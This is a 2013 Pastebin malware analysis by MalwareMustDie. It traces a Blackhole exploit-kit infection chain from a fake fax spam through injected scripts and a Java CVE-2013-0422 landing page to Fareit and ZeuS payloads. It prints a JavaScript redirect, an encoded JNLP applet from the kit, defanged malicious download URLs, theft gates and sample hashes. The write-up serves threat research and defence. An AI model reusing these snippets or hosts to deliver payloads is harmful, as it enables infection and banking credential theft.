API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie! Peeking at Recent Blackhole via IncomingFAX

MalwareMustDie
Sep 19th, 2013
1,814
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.51 KB | None | 0 0
raw download clone embed print report
  1. // #MalwareMustDie! The Blackhole infection
  2. // via Incoming FAX Report Spam
  3. // Same method of infection as: previous post http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
  4. // No Medfos found this time, A zbot Agent/downloader grabbed.
  5. // Sample: http://www.mediafire.com/?6p5al38dlxdlchr
  6. // @unixfreaxjp ~]$ date
  7. // Thu Sep 19 21:22:54 JST 2013
  8.  
  9.  
  10. --2013-09-19 18:59:58-- h00p://oakadventures.com/widow/index.html
  11. Resolving oakadventures.com... seconds 0.00, 50.63.73.1
  12. Caching oakadventures.com => 50.63.73.1
  13. Connecting to oakadventures.com|50.63.73.1|:80... seconds 0.00, connected.
  14. :
  15. GET /widow/index.html HTTP/1.0
  16. Host: oakadventures.com
  17. HTTP request sent, awaiting response...
  18. :
  19. HTTP/1.1 200 OK
  20. Date: Thu, 19 Sep 2013 10:00:01 GMT
  21. Server: Apache
  22. Accept-Ranges: bytes
  23. Vary: Accept-Encoding
  24. Content-Length: 442
  25. Keep-Alive: timeout=5, max=100
  26. Connection: Keep-Alive
  27. Content-Type: text/html
  28. :
  29. 200 OK
  30. Length: 442 [text/html]
  31. Saving to: `index.html'
  32. 2013-09-19 18:59:59 (14.5 MB/s) - `index.html' saved [442/442]
  33.  
  34.  
  35. // cat...
  36.  
  37. <script type="text/javascript" src="h00p://0068421.netsolhost.com/partisanship/poached.js"></script>
  38. <script type="text/javascript" src="h00p://ade-data.com/exuded/midyear.js"></script>
  39. <script type="text/javascript" src="h00p://fangstudios.com/macedonian/piles.js"></script>
  40.  
  41.  
  42. --2013-09-19 19:01:57-- h00p://0068421.netsolhost.com/partisanship/poached.js
  43. Resolving 0068421.netsolhost.com... seconds 0.00, 206.188.192.64
  44. Caching 0068421.netsolhost.com => 206.188.192.64
  45. Connecting to 0068421.netsolhost.com|206.188.192.64|:80... seconds 0.00, connected.
  46. :
  47. GET /partisanship/poached.js HTTP/1.0
  48. Referer: malwaremustdie.org
  49. Host: 0068421.netsolhost.com
  50. HTTP request sent, awaiting response...
  51. :
  52. HTTP/1.1 200 OK
  53. Date: Thu, 19 Sep 2013 10:01:57 GMT
  54. Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
  55. Last-Modified: Thu, 19 Sep 2013 10:00:12 GMT
  56. ETag: "e84aac-47-4e6b99ea839fb"
  57. Accept-Ranges: bytes
  58. Content-Length: 71
  59. Keep-Alive: timeout=3, max=200
  60. Connection: Keep-Alive
  61. Content-Type: application/javascript
  62. :
  63. 200 OK
  64. Length: 71 [application/javascript]
  65. Saving to: `poached.js'
  66. 2013-09-19 19:01:58 (2.02 MB/s) - `poached.js' saved [71/71]
  67.  
  68. // cat...
  69.  
  70. document.location='h00p://louievozza.com/topic/seconds-exist-foot.php';
  71.  
  72. // ZA LANDING PAGE ..
  73.  
  74. --2013-09-19 19:03:48-- h00p://louievozza.com/topic/seconds-exist-foot.php
  75. Resolving louievozza.com... seconds 0.00, 174.140.169.145
  76. Caching louievozza.com => 174.140.169.145
  77. Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
  78. :
  79. GET /topic/seconds-exist-foot.php HTTP/1.0
  80. Referer: malwaremustdie.org
  81. Host: louievozza.com
  82. HTTP request sent, awaiting response...
  83. :
  84. HTTP/1.1 200 OK
  85. Server: nginx/0.7.67
  86. Date: Thu, 19 Sep 2013 10:03:47 GMT
  87. Content-Type: text/html
  88. Connection: close
  89. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  90. :
  91. 200 OK
  92. Length: unspecified [text/html]
  93. Saving to: `seconds-exist-foot.php'
  94. 2013-09-19 19:03:51 (44.2 KB/s) - `seconds-exist-foot.php' saved [69693]
  95.  
  96. // Had three exploitation...see pic,
  97.  
  98. // JNLP goes here:
  99.  
  100. <applet width=\"1\" height=\"1\"><param name=\"jnlp_href\" value=\"!G28!!1bbaI.jnlp\"/><PA
  101. RAM name=\"jnlp_embedded\" value=\"PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4gDQo
  102. 8am5scCBzcGVjPSIxLjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPiANCjxpbmZvcm1hdGlvbj4gDQo8d
  103. Gl0bGU+Sk5MUDwvdGl0bGU+IA0KPHZlbmRvcj5KTkxQPC92ZW5kb3I+IA0KPGRlc2NyaXB0aW9uPkpOTFA8L2Rlc2N
  104. yaXB0aW9uPiANCjxvZmZsaW5lLWFsbG93ZWQvPiANCjwvaW5mb3JtYXRpb24+IA0KPHJlc291cmNlcz4gDQoJPGoyc
  105. 2UgdmVyc2lvbj0iMS42KyIgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIvPiA
  106. NCgk8amFyIGhyZWY9Ii90b3BpYy9zZWNvbmRzLWV4aXN0LWZvb3QucGhwPzN3ITBfXz04VkN4aTV4JjghTV8hbVItN
  107. SoyNFNMPUQqXzU2IiBtYWluPSJ0cnVlIi8+IA0KPC9yZXNvdXJjZXM+IA0KPGFwcGxldC1kZXNjIG5hbWU9IkpuIiB
  108. tYWluLWNsYXNzPSJNYWluIiB3aWR0aD0iMiIgaGVpZ2h0PSIyIj4NCiA8cGFyYW0gdmFsdWU9InRydWUiIG5hbWU9I
  109. l9fYXBwbGV0X3Nzdl92YWxpZGF0ZWQiPjwvcGFyYW0+IA0KPC9hcHBsZXQtZGVzYz4gDQo8L2pubHA+\"/><param
  110. name=\"prime\" value=\"iym.ttyw3D3x6NNmmZ8N0Dmcb_c_MrMr&#37;_?RK2ifchb_&#37;_rre_BrVrcre_V
  111. re_BR4=cLGE9rLSb__RP6&r4yB8fJbrpmU5_8#RqNcmbNhvpL1ahfYuPhOODyy3Ojj-tK8evtUUVw&#37;t0jyt38&
  112. #37;jie&#37;toMimek8iym.ttyw3D3x5s6L1M6b_c_MrMr&#37;_?RXaNfrb___B__r&#37;rV_c_r_M_B__Rvs4m
  113. sU/=Bb__RcKfBJ1NThLbI6AfzdLPrP-RNif64mzobPDNF&#37;Ai\"></param><param value=\"Dyy3Ojj-tK8e
  114. vtUUVw&#37;t0jyt38&#37;jie&#37;toMimek8\" name=\"val\"/><param name=\"duFJfXw\" value=\"ht
  115. tp://louievozza.com/topic/seconds-exist-foot.php?1__--Mi_m*h-9=w9wd8d8cwb&uKs092=wcw88ew78
  116. a898ewa8ew7&5H94!FCN84y=ww&61U85*t7i0I=8Q-zVw*iX&k_9!-=_2vQ!43R20LB62::h00p://louievozza.c
  117. om/topic/seconds-exist-foot.php?V!G1!43d1=w9wd8d8cwb&OR_*08!=www7ww8c8aw9w8wdw7ww&v!*G5-*G
  118. zTH7=ww&9u0!7I*3_P!24=W1g*0DS468*!6l&_!s015-D!n=6h_(qcgs!\"></param></applet>";
  119.  
  120.  
  121. //Non-JNLP goes here:
  122.  
  123. "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
  124. "h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56\"
  125.  
  126. --2013-09-19 19:26:21-- h00p://louievozza.com/topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56
  127. Resolving louievozza.com... seconds 0.00, 174.140.169.145
  128. Caching louievozza.com => 174.140.169.145
  129. Connecting to louievozza.com|174.140.169.145|:80... seconds 0.00, connected.
  130. :
  131. GET /topic/seconds-exist-foot.php?3w!0__=8VCxi5x&8!M_!mR-5*24SL=D*_56 HTTP/1.0
  132. Referer: malwareMUSTdie.org
  133. Host: louievozza.com
  134. HTTP request sent, awaiting response...
  135. :
  136. HTTP/1.1 200 OK
  137. Server: nginx/0.7.67
  138. Date: Thu, 19 Sep 2013 10:26:20 GMT
  139. Content-Type: application/java-archive
  140. Connection: keep-alive
  141. Content-Length: 30699
  142. X-Powered-By: PHP/5.3.14-1~dotdeb.0
  143. ETag: "71c92ebc2a889d3541ff6f20b4740868"
  144. Last-Modified: Thu, 19 Sep 2013 10:26:19 GMT
  145. Accept-Ranges: bytes
  146. :
  147. 200 OK
  148. Registered socket 1896 for persistent reuse.
  149. Length: 30699 (30K) [application/java-archive]
  150. Saving to: `java1.jar'
  151. 3-09-19 19:26:24 (36.4 KB/s) - `java1.jar' saved [30699/30699]
  152.  
  153. // Is a CVE-2013-0422... I saw this before...where? hmm..
  154. // getMBeanInstantiator
  155. // com.sun.jmx.mbeanserver.Introspector
  156. // javax.management.MbeanServerDelegateboolean
  157. // com.sun.jmx.mbeanserver.JmxMBeanServer
  158. // newMBeanServer
  159. // :
  160. // ah.. the same as previous findings (Doh!)
  161. // Link: http://malwaremustdie.blogspot.jp/2013/09/how-greedy-cyber-scums-are-leaked-plan.html
  162.  
  163.  
  164. //To make long story short...payload:
  165.  
  166. h00p://louievozza.com/adobe/update_flash_player.exe
  167.  
  168. GET /adobe/update_flash_player.exe HTTP/1.0
  169. Referer: malwaremustdie.org
  170. Host: louievozza.com
  171. HTTP request sent, awaiting response...
  172. :
  173. HTTP/1.1 200 OK
  174. Server: nginx/0.7.67
  175. Date: Thu, 19 Sep 2013 10:30:55 GMT
  176. Content-Type: application/octet-stream
  177. Connection: keep-alive
  178. Content-Length: 113664
  179. Last-Modified: Thu, 19 Sep 2013 10:30:01 GMT
  180. Accept-Ranges: bytes
  181. :
  182. 200 OK
  183. Registered socket 1896 for persistent reuse.
  184. Length: 113664 (111K) [application/octet-stream]
  185. Saving to: `update_flash_player.exe'
  186. 2013-09-19 19:31:00 (50.8 KB/s) - `update_flash_player.exe' saved [113664/113664]
  187.  
  188.  
  189. // This is the usual Win32/Fareit
  190.  
  191.  
  192. VT: https://www.virustotal.com/en/file/7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d/analysis/1379589491/
  193. SHA256: 7765902c6023647365c4f471c6eeb4d4bfd2e26b759c092135d138f4365c696d
  194. SHA1: 5e7a2032fea221beae9d509f92061ab0f1ae6578
  195. MD5: c08233e8051214fd65db330ca8b9dd6c
  196. File size: 111.0 KB ( 113664 bytes )
  197. File name: sample1.exe
  198. File type: Win32 EXE
  199. Detection ratio: 14 / 48
  200. Analysis date: 2013-09-19 11:18:11 UTC ( 0 minutes ago )
  201.  
  202.  
  203. The gates to post the steals..
  204.  
  205. h00p://louievozza.com/forum/viewtopic.php
  206. h00p://louvozza.com/forum/viewtopic.php
  207. h00p://lv-contracting.com/forum/viewtopic.php
  208. h00p://lvconcordecontracting.com/forum/viewtopic.php
  209.  
  210. The download for others..
  211.  
  212. h00p://arya-foundation.de/6Zt.exe
  213. h00p://jaycees.co.uk/zHHgp2.exe
  214. h00p://familiapaixao.coconet-us.com/tmMTo.exe
  215. h00p://www.maschinen.be/gMYiQdv.exe
  216.  
  217.  
  218. // The ZeuS Gameover...(downloaded by Fareit)
  219.  
  220. URL: https://www.virustotal.com/en/file/a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9/analysis/1379589455/
  221. SHA256: a8757588dc0fa034fd94c8a682eeb401b02180c90f8cd5e9ade63fc03823cce9
  222. SHA1: 61ce0ab07b794de746755a5bb1b53fc079c62b19
  223. MD5: 674b386f0cb0acec8ea8af4cd7c431c6
  224. File size: 300.5 KB ( 307712 bytes )
  225. File name: oqxub.exe
  226. File type: Win32 EXE
  227. Detection ratio: 9 / 48
  228. Analysis date: 2013-09-19 11:17:35 UTC ( 0 minutes ago )
  229.  
  230. target injections:
  231.  
  232. launchpadshell.exe
  233. dirclt32.exe
  234. wtng.exe
  235. prologue.exe
  236. pcsws.exe
  237. fdmaster.exe
  238.  
  239.  
  240. // brute logins..
  241.  
  242. bancline
  243. fidelity
  244. micrsolv
  245. bankman
  246. vantiv
  247. episys
  248. jack henry
  249. cruisenet
  250. gplusmain
  251.  
  252.  
  253. // Zbot Trojan/Agent..
  254.  
  255. URL: https://www.virustotal.com/en/file/efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589/analysis/1379589429/
  256. SHA256: efc0f51ba94a496de612bc8431d169720b47df01d21958834156af1c3d7cf589
  257. SHA1: 24ee0efe80d4ddb5e5559df79aacd35f41e56f88
  258. MD5: 5b95cc82cbec4f5705c10d13d59874a6
  259. File size: 43.0 KB ( 44078 bytes )
  260. File name: ydYGTvG.exe
  261. File type: Win32 EXE
  262. Detection ratio: 20 / 48
  263. Analysis date: 2013-09-19 11:17:09 UTC ( 0 minutes ago )
  264.  
  265. Reg: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders
  266.  
  267. Downloaded (driver)
  268. File name IvrufsinNomz.dll
  269. File Size 13824 bytes
  270. File Type PE32 (DLL) (GUI) x386
  271. MD5 b9bc7440d733e4346d45011ea649c6e4
  272.  
  273. Connection:
  274.  
  275. YAhoO.Com 98.139.183.24
  276. mta6.am0.yahoodns.net 66.196.118.34
  277. HOtMaIl.cOM 157.55.152.112
  278. mx2.HOtMaIl.cOM 65.55.37.104
  279.  
  280. ---
  281. #MalwareMUSTDiee!!!
  282. @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!